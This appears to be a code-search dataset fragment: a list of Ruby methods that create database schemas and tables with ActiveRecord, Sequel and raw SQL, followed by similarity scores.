"def create_schema(args={})\n args[:force] ||= false\n\n ActiveRecord::Schema.define do\n create_table :users, force: args[:force] do |t|\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :password, limit: 256, null: true\n t.text :vcard, null: true\n end\n add_index :users, :jid, unique: true\n\n create_table :contacts, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :jid, limit: 512, null: false\n t.string :name, limit: 256, null: true\n t.string :ask, limit: 128, null: true\n t.string :subscription, limit: 128, null: false\n end\n add_index :contacts, [:user_id, :jid], unique: true\n\n create_table :groups, force: args[:force] do |t|\n t.string :name, limit: 256, null: false\n end\n add_index :groups, :name, unique: true\n\n create_table :contacts_groups, id: false, force: args[:force] do |t|\n t.integer :contact_id, null: false\n t.integer :group_id, null: false\n end\n add_index :contacts_groups, [:contact_id, :group_id], unique: true\n\n create_table :fragments, force: args[:force] do |t|\n t.integer :user_id, null: false\n t.string :root, limit: 256, null: false\n t.string :namespace, limit: 256, null: false\n t.text :xml, null: false\n end\n add_index :fragments, [:user_id, :root, :namespace], unique: true\n end\n end",
"def create_database_schema!\n \n if file_format.class.const_defined?('Database')\n @orm_module = file_format.class.const_get('Database')\n else\n @orm_module = file_format.class.const_set('Database', Module.new)\n end\n\n create_request_table_and_class\n create_warning_table_and_class\n \n file_format.line_definitions.each do |name, definition|\n create_database_table(name, definition)\n create_activerecord_class(name, definition)\n end\n end",
"def create_schema\n Apartment::Database.create(subdomain)\n end",
"def create_schema\n puts \"Preparing table\"\n\n \tquery = <<-QUERY\n \t\tCREATE TABLE tasks (\n \t\t\tid INTEGER PRIMARY KEY,\n \t\t\ttitle TEXT NOT NULL,\n \t\t\tdescription TEXT,\n \t\t\tcompleted TEXT\n \t\t);\n \tQUERY\n db.execute(\"DROP TABLE IF EXISTS tasks;\")\n \tdb.execute(query)\n\n puts \"Table creation completed!\"\n\n end",
"def initialize_db_schema\n @db.exec(\n 'create table if not exists nodes\n (\n id SERIAL PRIMARY KEY,\n host VARCHAR(256) UNIQUE,\n last_seen TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,\n current_report INTEGER\n );\n\n create table if not exists collections\n (\n id SERIAL PRIMARY KEY,\n collection VARCHAR(256) NOT NULL,\n archived BOOL DEFAULT FALSE\n );\n\n create table if not exists reports\n (\n id SERIAL PRIMARY KEY,\n node_id INTEGER NOT NULL,\n file_handle INTEGER,\n status INTEGER NOT NULL,\n collection INTEGER NOT NULL,\n time TIMESTAMP NOT NULL,\n resources_changed INTEGER NOT NULL,\n resources_failed INTEGER NOT NULL,\n resources_total INTEGER NOT NULL,\n runtime REAL NOT NULL,\n new_report BOOL DEFAULT FALSE,\n FOREIGN KEY (node_id) REFERENCES nodes (id),\n FOREIGN KEY (collection) REFERENCES collections(id)\n );\n\n create table if not exists schemaversion\n (\n id SERIAL PRIMARY KEY,\n complete BOOL DEFAULT FALSE,\n comment VARCHAR(256) NOT NULL\n );\n create table if not exists reportdata\n (\n id SERIAL PRIMARY KEY,\n report bytea\n );\n '\n )\n end",
"def schema\n execute(<<-eosql).collect { |row| row[0] }.collect { |t| table_schema(t) }\nSELECT rdb$relation_name FROM rdb$relations WHERE rdb$system_flag != 1\neosql\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def schema_meta_structure\n CreateVersionsTableQuery.new.to_cql\n end",
"def create_table\n puts \"Creating table >> PEOPLE\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create\n puts \"Creating tumblr\"\n ActiveRecord::Base.connection.execute(File.open(\"db/schema.sql\").read)\n end",
"def createStakeholderTable\n @Handle.execute( @StakeholderSchema ) \n end",
"def create_database_sql(name, opts = {})\n \"CREATE DATABASE #{quote_identifier(name)}\"\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def init_schema\n ActiveRecord::Schema.define do\n create_table :cars, :force => true do |t|\n t.column :brand, :string\n t.column :model, :string\n end\n\n create_table :passengers, :force => true do |t|\n t.column :car_id, :int\n t.column :name, :string\n end\n end\n\n Car.create!(\n :brand => \"Mazda\",\n :model => \"Protege\"\n )\nend",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create_table_prefix_sql(name, options)\n \"CREATE #{temporary_table_sql if options[:temp]}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def create_table\n puts \"Creating people table\"\n $db.execute %q{\n CREATE TABLE people(\n id integer primary key,\n name varchar(50),\n job varchar(50),\n gender varchar(6),\n age integer\n )\n }\nend",
"def create_tables\n self.conn.exec(\n File.read(\"./lib/creating_tables.txt\")\n \n )\n end",
"def create_schema schema_id, type, definition, options = {}\n schema = Google::Cloud::PubSub::V1::Schema.new(\n type: type,\n definition: definition\n )\n schemas.create_schema parent: project_path(options),\n schema: schema,\n schema_id: schema_id\n end",
"def user_defined_schemas(stream)\n return if (list = (@connection.user_defined_schemas - ['public'])).empty?\n\n stream.puts \" # Custom schemas defined in this database.\"\n list.each { |name| stream.puts \" create_schema \\\"#{name}\\\", force: :cascade\" }\n stream.puts\n end",
"def schema\n schema = Schema.new\n\n for name in db.tables\n next if IGNORED_TABLES.include? name\n table = schema.add_table( name )\n import_table( table )\n end\n\n schema\n end",
"def create_table(table)\n db_client.query(\"SHOW CREATE TABLE #{table['name']}\").first['Create Table'] + ';'\n end",
"def create_database\n $conn.exec(\"\"\"\n CREATE TABLE users (\n id SERIAL NOT NULL,\n name varchar(255) NOT NULL,\n created_at timestamp NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE UNIQUE INDEX user_names ON users (name);\n CREATE TABLE blathers (\n id SERIAL NOT NULL,\n text varchar(141) NOT NULL,\n created_at timestamp NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (id)\n );\n CREATE TABLE blathers_mentioned_users (\n blather_id integer NOT NULL,\n user_id integer NOT NULL,\n PRIMARY KEY (blather_id, user_id)\n );\n \"\"\")\nend",
"def initialize_schema!\n Schema.create(self)\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def prepare_schema\n tables = [];ActiveRecord::Base.connection.execute(\"show tables\").each{|t| tables << t[0].strip}\n \n ActiveRecord::Schema.define do\n App.log.info(\"preparing schema\")\n \n unless tables.include?(\"services\")\n # a service entry\n begin\n create_table :services do |t|\n t.string :name\n t.string :status, :null => false, :default => \"active\"\n end\n add_index :services, :name\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"queries\")\n begin\n # queries\n create_table :queries do |t|\n t.string :query \n t.column :last_twid, :bigint, :null => false, :default => 0\n t.timestamp :last_run\n t.integer :last_result_count\n t.string :status, :default => 'active', :null=> false\n end\n add_index :queries, :query\n rescue\n App.log_exception\n end\n end\n \n unless tables.include?(\"tweets\")\n begin\n # cache of tweets\n create_table :tweets do |t|\n t.column :twid, :bigint, :null => false\n t.string :from_user\n t.string :to_user\n t.integer :from_user_id\n t.integer :to_user_id\n t.string :text\n t.string :profile_image_url\n t.timestamp :created_at\n end\n add_index :tweets, :twid\n rescue\n App.log_exception\n end\n end\n \n end # define schema\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def create_table_from_schema(table,exec=true,schema=nil)\n\n if schema == nil\n schema = get_table_schema(table)\n if !schema\n @logger.warn(\"#{TAG} No schema exists for table #{table}\")\n return false\n end\n end\n\n query = \"create table #{table} (\\n\"\n schema[:columns].each_with_index do |(column_name,column),index|\n\n query += \"#{column_name} \" + column[:type]\n if column[:constraint] != nil\n query += \" \" + column[:constraint]\n end\n if index != schema[:columns].size - 1\n query += \",\"\n end\n query += \"\\n\"\n end\n query += \")\"\n\n # Add table attributes\n if schema[:distkey] != nil\n query += \"\\ndistkey(#{schema[:distkey]})\"\n end\n if schema[:sortkey] != nil\n query += \"\\nsortkey(#{schema[:sortkey]})\"\n end\n\n query += \";\\n\"\n\n if exec\n conn = new_redshift_connection()\n result = conn.exec(query)\n else\n result = query\n end\n\n return result\n end",
"def dump_table_schema(table, options=OPTS)\n gen = dump_table_generator(table, options)\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && !gen.indexes.empty?}) do\\n#{commands.gsub(/^/, ' ')}\\nend\"\n end",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(schema_params)\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render :show, status: :created, location: @schema }\n else\n format.html { render :new }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_schema\n create_table unless table_exists?\n (schema_columns - column_names).each { |column| ActiveRecord::Migration.add_column(table_name, column, :string) }\n (column_names - protected_columns - schema_columns).each { |column| ActiveRecord::Migration.remove_column(table_name, column) }\n end",
"def import_schemata!\n output 'Dropping and re-creating table definitions'\n result = mysql_root_cmd \"source #{Jetpants.export_location}/create_tables_#{@port}.sql\", terminator: '', schema: true\n output result\n end",
"def import_schemata!\n output 'Dropping and re-creating table definitions'\n result = mysql_root_cmd \"source #{Jetpants.export_location}/create_tables_#{@port}.sql\", terminator: '', schema: true\n output result\n end",
"def create_table(klass)\n fields = fields_for_class(klass)\n\n sql = \"CREATE TABLE #{klass.table} (#{fields.join(', ')}\"\n\n # Create table constraints.\n\n if constraints = klass.ann(:self, :sql_constraint)\n sql << \", #{constraints.join(', ')}\"\n end\n\n # Set the table type (Mysql default, InnoDB, Hash, etc)\n\n if table_type = @options[:table_type]\n sql << \") TYPE = #{table_type};\"\n else\n sql << \")\"\n end\n\n begin\n exec(sql, false)\n info \"Created table #{klass.table}.\"\n rescue Object => ex\n if table_already_exists_exception? ex\n # Don't return yet. Fall trough to also check for the\n # join table.\n else\n handle_sql_exception(ex, sql)\n end\n end\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def create\n @schema_table = SchemaTable.new(schema_table_params)\n\n respond_to do |format|\n if @schema_table.save\n format.html { redirect_to @schema_table, notice: 'Schema table was successfully created.' }\n format.json { render :show, status: :created, location: @schema_table }\n else\n format.html { render :new }\n format.json { render json: @schema_table.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, notice: 'Schema was successfully created.' }\n format.json { render json: @schema, status: :created, location: @schema }\n else\n format.html { render action: \"new\" }\n format.json { render json: @schema.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_table_prefix_sql(name, options)\n prefix_sql = if options[:temp]\n raise(Error, \"can't provide both :temp and :unlogged to create_table\") if options[:unlogged]\n raise(Error, \"can't provide both :temp and :foreign to create_table\") if options[:foreign]\n temporary_table_sql\n elsif options[:foreign]\n raise(Error, \"can't provide both :foreign and :unlogged to create_table\") if options[:unlogged]\n 'FOREIGN '\n elsif options[:unlogged]\n 'UNLOGGED '\n end\n\n \"CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}\"\n end",
"def property_schema_statement(schema)\n statement = super\n statement << ' AUTO_INCREMENT' if supports_serial? && schema[:serial?]\n statement\n end",
"def create_table_as(name, sql, options)\n sql = sql.sql if sql.is_a?(Sequel::Dataset)\n run(create_table_as_sql(name, sql, options))\n end",
"def to_create_database_sql(db)\n db.send(:create_database_sql, self.name, {})\n end",
"def schema_generator_script(schema_name, mode = 'create', owner: DefaultSchemaOwner)\n cname = \"#{mode}_#{schema_name}_schema_#{migration_version}\".camelize\n\n <<~CONTENT\n require 'active_record/migration/app_generator'\n class #{cname} < ActiveRecord::Migration[5.2]\n include ActiveRecord::Migration::AppGenerator\n\n def change\n self.schema = '#{schema_name}'\n self.owner = '#{owner}'\n create_schema\n end\n end\n CONTENT\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def create_publication(name, all_tables = false, tables = [], options = {})\n base_command = \"CREATE PUBLICATION #{connection.quote_ident(name)}\"\n if all_tables\n base_command << \" FOR ALL TABLES\"\n elsif !tables.empty?\n base_command << \" FOR TABLE #{safe_list(tables)}\"\n end\n typed_exec(@command_builder.command_with_options(base_command, \"WITH\", options))\n end",
"def create\n @schema = Schema.new(params[:schema])\n\n respond_to do |format|\n if @schema.save\n format.html { redirect_to @schema, :notice => 'Schema was successfully created.' }\n format.json { render :json => @schema, :status => :created, :location => @schema }\n else\n format.html { render :action => \"new\" }\n format.json { render :json => @schema.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def drop_and_create_schema_migrations_table\n sql = [\n \"USE #{@database}\",\n 'DROP TABLE IF EXISTS schema_migrations',\n 'CREATE TABLE schema_migrations ( version varchar(255) COLLATE utf8_unicode_ci NOT NULL, UNIQUE KEY unique_schema_migrations (version)) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci'\n ]\n\n run_commands(sql)\n end",
"def createUserTable\n @conn.exec(\"CREATEE users (id serial NOT NULL, name character varying(255), CONSTRAINT users_pkey PRIMARY KEY (id)) WITH (OIDS=FALSE);\");\n end",
"def set_schema(name = nil, &block)\n set_dataset(db[name]) if name\n @schema = db.create_table_generator(&block)\n set_primary_key(@schema.primary_key_name) if @schema.primary_key_name\n end",
"def drop_schema_sql(name, opts=OPTS)\n \"DROP SCHEMA#{' IF EXISTS' if opts[:if_exists]} #{quote_identifier(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def create_schema\n schema = @index.schema\n unless schema.tables['search']\n @index.execute_batch <<-SQL\n CREATE VIRTUAL TABLE search USING fts5(\n sequence_number,\n kanji,\n kana,\n senses\n );\n SQL\n @index.reload_schema!\n end\n end",
"def create\n if @db.table_info(METADATA_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{METADATA_TABLE_NAME} (key VARCHAR(1024), val VARCHAR(8192), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(RUN_HISTORY_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{RUN_HISTORY_TABLE_NAME} (name VARCHAR(1024), outcome VARCHAR(16), env VARCHAR(255), time DATETIME)\"\n @db.execute(stmt)\n\n index_stmt = \"CREATE INDEX index_run_history ON #{RUN_HISTORY_TABLE_NAME} (time DESC)\"\n @db.execute(index_stmt)\n end\n\n if @db.table_info(DISABLED_MONITOR_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{DISABLED_MONITOR_TABLE_NAME} (name VARCHAR(1024), env VARCHAR(255))\"\n @db.execute(stmt)\n end\n\n if @db.table_info(MONITOR_INFO_TABLE_NAME).empty?\n stmt = \"CREATE TABLE #{MONITOR_INFO_TABLE_NAME} (name VARCHAR(1024), description VARCHAR(8192))\"\n @db.execute(stmt)\n end\n end",
"def create_table (table_name)\r\n\t\"CREATE TABLE IF NOT EXISTS \" + table_name + \r\n\t\"(\r\n\tid INTEGER PRIMARY KEY,\r\n\ttitle VARCHAR(255),\r\n\tcode VARCHAR(255)\r\n\t)\"\r\nend",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_products_table\n c = PGconn.new(:host => \"localhost\", :dbname => dbname)\n c.exec %q{\n CREATE TABLE products (\n id SERIAL PRIMARY KEY,\n name varchar(255),\n price decimal,\n description text\n );\n }\n c.close\nend",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def schema_definition\n of.schema_definition \n end",
"def create_table_suffix_sql(name, options)\n sql = String.new\n\n if inherits = options[:inherits]\n sql << \" INHERITS (#{Array(inherits).map{|t| quote_schema_table(t)}.join(', ')})\"\n end\n\n if partition_by = options[:partition_by]\n sql << \" PARTITION BY #{options[:partition_type]||'RANGE'} #{literal(Array(partition_by))}\"\n end\n\n if on_commit = options[:on_commit]\n raise(Error, \"can't provide :on_commit without :temp to create_table\") unless options[:temp]\n raise(Error, \"unsupported on_commit option: #{on_commit.inspect}\") unless ON_COMMIT.has_key?(on_commit)\n sql << \" ON COMMIT #{ON_COMMIT[on_commit]}\"\n end\n\n if tablespace = options[:tablespace]\n sql << \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n if server = options[:foreign]\n sql << \" SERVER #{quote_identifier(server)}\"\n if foreign_opts = options[:options]\n sql << \" OPTIONS (#{foreign_opts.map{|k, v| \"#{k} #{literal(v.to_s)}\"}.join(', ')})\"\n end\n end\n\n sql\n end",
"def set_schema(schema)\n @current_schema = nil\n execute \"SET SCHEMA #{schema}\", 'SCHEMA'\n end",
"def create_table_sql(name, generator, options)\n a, b = super(name, generator, options), table_options_sql(options)\n \"#{a}\\n#{b}\"\n\t end",
"def show_create_table(db, table)\n end",
"def create_database(name, options = {})\n options = options.reverse_merge(encoding: 'utf8')\n\n option_string = options.symbolize_keys.sum do |key, value|\n case key\n when :owner\n \" OWNER = \\\"#{value}\\\"\"\n when :template\n \" TEMPLATE = \\\"#{value}\\\"\"\n when :encoding\n \" ENCODING = '#{value}'\"\n when :tablespace\n \" TABLESPACE = \\\"#{value}\\\"\"\n when :connection_limit\n \" CONNECTION LIMIT = #{value}\"\n else\n ''\n end\n end\n\n execute(\"CREATE DATABASE #{quote_table_name(name)}#{option_string}\")\n end",
"def createTaskTable\n @Handle.execute( @TaskSchema ) \n end",
"def create_movies_table\n c = PGconn.new(:host => \"localhost\", :dbname => \"test\")\n c.exec %q{\n CREATE TABLE movies (\n id PRIMARY KEY,\n title TEXT,\n description TEXT,\n rating INTEGER\n );\n }\n c.close\nend",
"def dump_table_schema(table, options={})\n table = table.value.to_s if table.is_a?(SQL::Identifier)\n raise(Error, \"must provide table as a Symbol, String, or Sequel::SQL::Identifier\") unless [String, Symbol].any?{|c| table.is_a?(c)}\n s = schema(table).dup\n pks = s.find_all{|x| x.last[:primary_key] == true}.map{|x| x.first}\n options = options.merge(:single_pk=>true) if pks.length == 1\n m = method(:column_schema_to_generator_opts)\n im = method(:index_to_generator_opts)\n begin\n indexes = indexes(table).sort_by{|k,v| k.to_s} if options[:indexes] != false\n rescue Sequel::NotImplemented\n nil\n end\n gen = Schema::Generator.new(self) do\n s.each{|name, info| send(*m.call(name, info, options))}\n primary_key(pks) if !@primary_key && pks.length > 0\n indexes.each{|iname, iopts| send(:index, iopts[:columns], im.call(table, iname, iopts))} if indexes\n end\n commands = [gen.dump_columns, gen.dump_constraints, gen.dump_indexes].reject{|x| x == ''}.join(\"\\n\\n\")\n \"create_table(#{table.inspect}#{', :ignore_index_errors=>true' if !options[:same_db] && options[:indexes] != false && indexes && !indexes.empty?}) do\\n#{commands.gsub(/^/o, ' ')}\\nend\"\n end",
"def create!(con)\n con.exec create_stmt\n end",
"def __create_meta_data_table_for schema\n ActiveRecord::Base.establish_connection(self.connection_data) unless schema.connected?\n\n # Clears the table cache for the schema (remove TableDoesNotExists if a table actually exists)\n schema.clear_cache!\n\n unless schema.table_exists?\n ActiveRecord::Schema.define do\n create_table schema.table_name do |t|\n t.column :version, :float\n end\n end\n end\n end",
"def generate_query\n unless databases.nil?\n databases.each do |db|\n create_query[db] = [\"create table #{tablename} (\"]\n end\n csv_column_datatypes.each do |header, datatype|\n append_to_query = build_query_for_datatype(header, datatype)\n append_to_query.each do |key, value|\n create_query[key].push(value)\n end\n end\n prepare_sql_statements\n prepare_import_csv\n # Pass the prepared statements to options varaible.\n # Which gets passed on to print_metadata_analysis\n options[:create_query] = create_query\n options[:import_query] = import_query\n end\n print_metadata_analysis\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_tables!\n migrate(:up)\n end"
] |
[
"0.8491162",
"0.8416065",
"0.8397193",
"0.8367142",
"0.8297997",
"0.7959022",
"0.7633281",
"0.7361771",
"0.7265676",
"0.725682",
"0.7212021",
"0.7210765",
"0.7127146",
"0.7030964",
"0.69537985",
"0.6888085",
"0.6867996",
"0.6858188",
"0.685559",
"0.6830588",
"0.6817735",
"0.6797758",
"0.67968524",
"0.67225933",
"0.6686438",
"0.6642827",
"0.66419667",
"0.65857965",
"0.6584558",
"0.6501493",
"0.6500645",
"0.6477445",
"0.646444",
"0.64482164",
"0.6446704",
"0.6440753",
"0.6440637",
"0.64377683",
"0.6435648",
"0.64046454",
"0.63613504",
"0.63470525",
"0.6335003",
"0.63319755",
"0.63153446",
"0.631337",
"0.63127524",
"0.631133",
"0.6302986",
"0.62993383",
"0.6289113",
"0.6289113",
"0.6289113",
"0.6256081",
"0.6253094",
"0.6246127",
"0.6236883",
"0.6236883",
"0.6233763",
"0.62110007",
"0.62110007",
"0.6206255",
"0.62044984",
"0.619378",
"0.6180945",
"0.6178015",
"0.6177059",
"0.6171303",
"0.61710143",
"0.6149872",
"0.6146691",
"0.614491",
"0.614347",
"0.6139659",
"0.6124996",
"0.61219895",
"0.61207813",
"0.61083233",
"0.61018544",
"0.60952175",
"0.6094614",
"0.6093026",
"0.6091505",
"0.6074933",
"0.6050737",
"0.60413015",
"0.6037047",
"0.6036439",
"0.6036288",
"0.6022185",
"0.60186064",
"0.6016578",
"0.6010991",
"0.6010407",
"0.59827507",
"0.5982061",
"0.5981747",
"0.597863",
"0.5977552",
"0.59725153"
] |
0.81587696
|
5
|
DDL statement for creating a table with the given name, columns, and options
|
def create_table_prefix_sql(name, options)
  prefix_sql = if options[:temp]
    raise(Error, "can't provide both :temp and :unlogged to create_table") if options[:unlogged]
    raise(Error, "can't provide both :temp and :foreign to create_table") if options[:foreign]
    temporary_table_sql
  elsif options[:foreign]
    raise(Error, "can't provide both :foreign and :unlogged to create_table") if options[:unlogged]
    'FOREIGN '
  elsif options[:unlogged]
    'UNLOGGED '
  end

  "CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}"
end
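
For reference, a minimal self-contained Ruby sketch exercising this prefix logic. The Error class and the temporary_table_sql, quote_identifier, and quote_schema_table stubs below are assumptions for illustration; in the real adapter these live on a Sequel-style Database object:

# Stubbed helpers so the prefix logic runs stand-alone.
Error = Class.new(StandardError)

def temporary_table_sql
  'TEMPORARY '
end

def quote_identifier(name)
  "\"#{name}\""
end

def quote_schema_table(name)
  "\"#{name}\""   # naive; ignores schema-qualified names
end

def create_table_prefix_sql(name, options)
  prefix_sql = if options[:temp]
    raise(Error, "can't provide both :temp and :unlogged to create_table") if options[:unlogged]
    raise(Error, "can't provide both :temp and :foreign to create_table") if options[:foreign]
    temporary_table_sql
  elsif options[:foreign]
    raise(Error, "can't provide both :foreign and :unlogged to create_table") if options[:unlogged]
    'FOREIGN '
  elsif options[:unlogged]
    'UNLOGGED '
  end

  "CREATE #{prefix_sql}TABLE#{' IF NOT EXISTS' if options[:if_not_exists]} #{options[:temp] ? quote_identifier(name) : quote_schema_table(name)}"
end

puts create_table_prefix_sql(:events, unlogged: true, if_not_exists: true)
# CREATE UNLOGGED TABLE IF NOT EXISTS "events"
puts create_table_prefix_sql(:scratch, temp: true)
# CREATE TEMPORARY TABLE "scratch"

Note the design choice: :temp, :foreign, and :unlogged are mutually exclusive, so conflicting combinations raise early instead of emitting invalid DDL, and a temporary table name is quoted as a bare identifier rather than a schema-qualified one.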
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table(create_table_options = {})\n self.connection.create_table(table_name, create_table_options) do |t|\n t.column :undone, :boolean, :default => false, :null => false\n t.column :description, :string\n t.column :updated_at, :timestamp\n end\n end",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
